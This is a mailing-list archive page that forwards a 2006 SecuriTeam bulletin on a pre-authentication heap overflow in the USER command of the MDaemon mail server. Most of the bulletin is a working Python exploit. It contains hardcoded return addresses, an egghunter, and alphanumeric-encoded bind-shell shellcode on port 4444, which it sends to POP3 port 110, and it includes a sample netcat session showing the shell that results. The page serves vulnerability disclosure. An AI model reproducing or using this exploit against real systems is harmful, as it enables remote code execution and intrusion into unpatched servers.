Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [EXPL] MDaemon USER Pre-Authentication Heap Overflow (Exploit)



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Monday, August 28, 2006 3:42 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] MDaemon USER Pre-Authentication Heap Overflow 
> (Exploit)
> 
> 
> 
> MDaemon USER Pre-Authentication Heap Overflow (Exploit) 
> 
> 
> 
> MDaemon 
> <http://www.altn.com/products/default.asp/product_id/MDaemon> 
>  is a mail transfer agent for Microsoft Windows, produced by 
> Alt-N Technologies. 
> 
> An heap overflow in the user name buffer allows for remote 
> code execution. 
> 
> 
> Vulnerable Systems: 
>  * Mdaemon versions 9.0.5, 7.2.3, 7.2.2, 7.2.1 and 7.2.0 
> 
> Exploit: 
> #!/usr/bin/python 
> import sys 
> import struct 
> import socket 
> from time import sleep 
> ##############################################################
> ########################## 
> # MDaemon Pre Authentication (USER) Heap Overflow 
> # Code based on Leon Juranic's exploit 
> # Coded by muts - mati@xxxxxxxxxxxxxxxx 
> # http://www.hackingdefined.com 
> # http://www.remote-exploit.org 
> # Tested on: 
> # Mdaemon 9.0.5 
> # Mdaemon 7.2.3 
> # Mdaemon 7.2.2 
> # Mdaemon 7.2.1 
> # Mdaemon 7.2.0 
> # Possibly Others 
> # PLEASE CONTINUE READING ! 
> # Huge greets to xbxice and talz for leading me away from the 
> darkness 
> ##############################################################
> ########################## 
> # Mdaemon is weird. It seems like their developers decided to 
> annoy everyone 
> # by making their software do unexpected things. 
> # The exploit overwrites UnhandledExceptionFilter, and jumps 
> to an egghunter 
> # shellcode - which then scans the memory, and executes a 
> bindshell on port 4444. 
> # 
> # On some Win2k SP4 machines, I found 
> SetUnhandledExceptionFilter at 0x00000214, 
> # for which I unfortunately had no explanation. 
> # I later found out that these machines were fully patched ... 
> # After inspecting kernel32.dll from my SP4 (not fully 
> patched) and comparing it to 
> # todays' version, I noticed that the 
> SetunhandledExceptionFilter function had changed, 
> # and looks suspiciously similar to XP SP2... 
> # Note that my unpatched win2k was last patched 2-3 weeks ago, 
> # so I suspect this change is recent. 
> # The end of easy UnhandledExceptionFilter exploitation on Win2k ? 
> # 
> # So, this is a partially working exploit, on unpatched win2k 
> boxes.... 
> # Kiddies, treat this exploit as DOS :) 
> # 
> # I got 3 types of results with this code: 
> # 
> # 1. Shell :) 
> # 2. Mdaemon process shoots up to 100%, scanning memory for 
> shellcode that isn't there. 
> # 3. Plain ugly crash - oh well. 
> # 
> # At minimum, I'd check the UnhandledExceptionFilter address 
> before running the exploit. 
> ##############################################################
> ########################## 
> # 
> # C:\Documents and Settings\muts>nc -v 192.168.220.128 4444 
> # 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open 
> # Microsoft Windows 2000 [Version 5.00.2195] 
> # (C) Copyright 1985-2000 Microsoft Corp. 
> # 
> # C:\MDaemon\APP> 
> ##############################################################
> ########################## 
> 
> host="192.168.220.128" 
> 
> ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP 
> ESI+48 SP4 No Patches 
> ueh = struct.pack("<L",0x7C54144C) # 
> SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches 
> tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage 
> 
> # skape's egghunter shellcode 
> 
> egghunter 
> ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23" 
> egghunter 
> +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f" 
> egghunter 
> +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8" 
> egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3" 
> 
> # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum 
> 
> shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!) 
> shellcode 
> +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" 
> shellcode 
> +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" 
> shellcode 
> +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" 
> shellcode 
> +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" 
> shellcode 
> +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" 
> shellcode 
> +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" 
> shellcode 
> +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57" 
> shellcode 
> +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48" 
> shellcode 
> +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48" 
> shellcode 
> +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c" 
> shellcode 
> +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" 
> shellcode 
> +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38" 
> shellcode 
> +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54" 
> shellcode 
> +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38" 
> shellcode 
> +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d" 
> shellcode 
> +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38" 
> shellcode 
> +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46" 
> shellcode 
> +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" 
> shellcode 
> +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57" 
> shellcode 
> +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" 
> shellcode 
> +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e" 
> shellcode 
> +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50" 
> shellcode 
> +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" 
> shellcode 
> +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34" 
> shellcode 
> +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51" 
> shellcode 
> +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a" 
> shellcode 
> +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51" 
> shellcode 
> +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42" 
> shellcode 
> +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d" 
> shellcode 
> +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d" 
> shellcode 
> +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56" 
> shellcode 
> +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45" 
> shellcode 
> +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46" 
> shellcode 
> +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c" 
> shellcode 
> +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c" 
> shellcode 
> +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42" 
> shellcode 
> +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" 
> shellcode 
> +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f" 
> shellcode 
> +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56" 
> shellcode 
> +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56" 
> shellcode 
> +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" 
> shellcode 
> +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f" 
> shellcode 
> +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" 
> shellcode 
> +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d" 
> shellcode +="\x4f\x4f\x42\x4d\x5a" 
> 
> buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346 
> 
> for x in range(5): 
>         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
>         s.connect((host,110)) 
>         data=s.recv(1024) 
>         print data 
>         s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode 
> +'D'*3711 + '\r\n') 
>         s.send('QUIT\r\n') 
>         s.close() 
>         sleep(1) 
> 
> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
> s.connect((host,110)) 
> data=s.recv(1024) 
> print data 
> s.send('USER ' + '@A@A'+ buffer + '\r\n') 
> data=s.recv(1024) 
> print data 
> s.send('USER ' + 'A' * 3370 + '\r\n') 
> s.close() 
> 
> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
> s.connect((host,110)) 
> data=s.recv(1024) 
> print data 
> s.send('USER ' + '@A@A'+ buffer + '\r\n') 
> data=s.recv(1024) 
> print data 
> s.send('USER ' + 'A' * 3370 + '\r\n') 
> s.close() 
> sleep(1) 
> 
> 
> Additional Information: 
> The information has been provided by muts 
> <mailto:mati@xxxxxxxxxxxxxxxx> . 
> Related article(s): 
> Remote Buffer Overflow in MDaemon (Exploit) 
> <http://www.securiteam.com/exploits/5QP0D1PCAC.html>  
> 
> 
> ==============================================================
> ================== 
> 
> 
> 
> 
> 
> This bulletin is sent to members of the SecuriTeam mailing list. 
> To unsubscribe from the list, send mail with an empty subject 
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx 
> In order to subscribe to the mailing list and receive 
> advisories in HTML format, simply forward this email to: 
> html-list-subscribe@xxxxxxxxxxxxxx 
> 
> 
> 
> ==============================================================
> ================== 
> ==============================================================
> ================== 
> 
> DISCLAIMER: 
> The information in this bulletin is provided "AS IS" without 
> warranty of any kind. 
> In no event shall we be liable for any damages whatsoever 
> including direct, indirect, incidental, consequential, loss 
> of business profits or special damages. 
> 
> 
> 
> 
> 
> 




 




Copyright © Lexa Software, 1996-2009.